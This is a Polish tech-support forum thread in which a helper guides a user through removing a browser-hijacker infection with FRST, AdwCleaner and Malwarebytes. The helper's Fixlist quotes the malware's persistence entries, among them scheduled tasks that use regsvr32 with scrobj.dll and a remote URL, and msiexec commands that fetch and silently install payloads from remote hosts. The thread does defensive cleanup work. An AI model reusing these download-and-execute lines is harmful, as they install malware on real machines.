Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

ozirizsoos.info - czy ktoś pomoże?

Jakubowski2 14 Sty 2018 20:25 405 6
  • #1 14 Sty 2018 20:25
    Jakubowski2
    Poziom 7  

    Korzystałem z przeglądarki Opera i nagle po uruchomieniu systemu zaczęła się uruchamiać automatycznie i przekierowywała na stronę gameorplay.info. Nie umiałem sobie z tym poradzić, więc odinstalowałem przeglądarkę, a teraz po uruchomieniu systemu wyskakuje błąd: ozirizsoos.info - nie można odnaleźć aplikacji.

    Wiem, że problem można załatwić przez FRST, tylko nie wiem skąd bierze się te pliki, na podstawie których pomagacie wyeliminować tego wirusa. Załączę takie dwa pliki, ale nie mam pojęcia, czy są one prawidłowe - włączam FRST, wyszukuję FRST i ADDITIONAL i zapisuję. Jeśli robię to źle to proszę o pokierowanie.
    Czy ktoś mógłby mi pomóc. Będę bardzo wdzięczny!

    Niepoprawne pliki z FRST usuwam. W poście nr.3 są poprawnie wygenerowane pliki z programu.
    RADU23

    0 6
  • CControls
  • #2 14 Sty 2018 20:28
    Kolobos
    Spec od komputerów

    Oczywiscie, ze nie sa. W FRST wybierz skanowanie i pliki sie utworza po zakonczeniu.

    0
  • CControls
  • #4 14 Sty 2018 20:51
    Kolobos
    Spec od komputerów

    Zrob kopie zakladek z Firefox, profil utworzony przez infekcje zostanie usuniety.

    Uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    W katalogu w ktorym masz FRST (E:\downloads), utworz plik Fixlist.txt z podane zawartoscia:
    Task: {334B6719-2005-435F-9617-5967A577A860} - System32\Tasks\Marcin => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Marcin /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA
    Task: {39C089B2-EB2A-4273-B9BE-772FF12F93EF} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://7c8ogu7.x.incapdns.net/?data=zDlkMj82FkYcNdzYMjE3NUEdFdIdRjUxMWFyOWIdNUEdOYFxMq== scrobj.dll <==== UWAGA
    Task: {6220E152-E339-4072-AD82-03B8B9B12447} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.yzsgrwz.com/?data=zDlkMj82FkYcNdzYMjE3NUEdFdIdRjUxMWFyOWIdNUEdOYFxMq== scrobj.dll <==== UWAGA
    Task: {EDE8ED44-D046-4FB7-91FD-41201B47CBFC} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA
    HKU\S-1-5-21-3754211421-2314414738-4126897331-1001\...\Run: [Marcin] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA
    HKU\S-1-5-21-3754211421-2314414738-4126897331-1001\...\RunOnce: [Application Restart #0] => C:\Windows\SysWOW64\muachost.exe [1692840 2015-08-18] (MSI)
    HKU\S-1-5-21-3754211421-2314414738-4126897331-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.tslznzq.com/?data=zDlkMj82FkYcNdzYMjE3NUEdFdIdRjUxMWFyOWIdNUEdOYFxMq== /q <==== UWAGA
    C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\IHfEcJzf.default
    FF ProfilePath: C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\IHfEcJzf.default [2017-05-24] <==== UWAGA
    FF Extension: (FF Adr) - C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\IHfEcJzf.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-17] [Brak podpisu cyfrowego]
    FF Extension: (Avira Browser Safety) - C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\IHfEcJzf.default\Extensions\abs@avira.com.xpi [2016-04-16] [Przestarzałe]
    FF Extension: (Polski Language Pack) - C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\IHfEcJzf.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-24] [Przestarzałe] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\IHfEcJzf.default\searchplugins\startsearch.xml [2017-05-24]
    FF HKU\S-1-5-21-3754211421-2314414738-4126897331-1001\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Marcin\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi




    FF Extension: (__MSG_extName__) - C:\Users\Marcin\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2017-11-09]
    CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=9c778ec34291913b9011c01g2z5tbwde8tcm7c2mdq
    CHR StartupUrls: Default -> ""
    CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type...8ec34291913b9011c01g2z5tbwde8tcm7c2mdq&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> luck
    CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3754211421-2314414738-4126897331-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-3754211421-2314414738-4126897331-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe <==== UWAGA
    C:\Program Files (x86)\Hotleaf\
    2017-12-28 16:15 - 2017-12-28 16:15 - 000003572 _____ C:\WINDOWS\System32\Tasks\Marcin
    2017-12-18 18:57 - 2017-12-18 18:57 - 000002654 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-12-18 18:57 - 2017-12-18 18:57 - 000002632 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    2017-09-22 18:53 - 2017-09-22 18:53 - 000000028 _____ () C:\Users\Marcin\AppData\Roaming\kulerdata.json
    2017-09-10 11:56 - 2018-01-14 12:44 - 000000016 _____ () C:\Users\Marcin\AppData\Roaming\msregsvv.dll

    W FRST wybierz Napraw.

    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/

    Po wykonaniu wszystkiego zamiesc nowe logi z FRST, ze skanowania.

    0
  • Pomocny post
    #6 14 Sty 2018 21:29
    Kolobos
    Spec od komputerów

    Usun katalogi:
    C:\AdwCleaner
    C:\FRST

    To wszystko.

    0
  • #7 14 Sty 2018 21:46
    Jakubowski2
    Poziom 7  

    Bardzo, bardzo dziękuję!

    0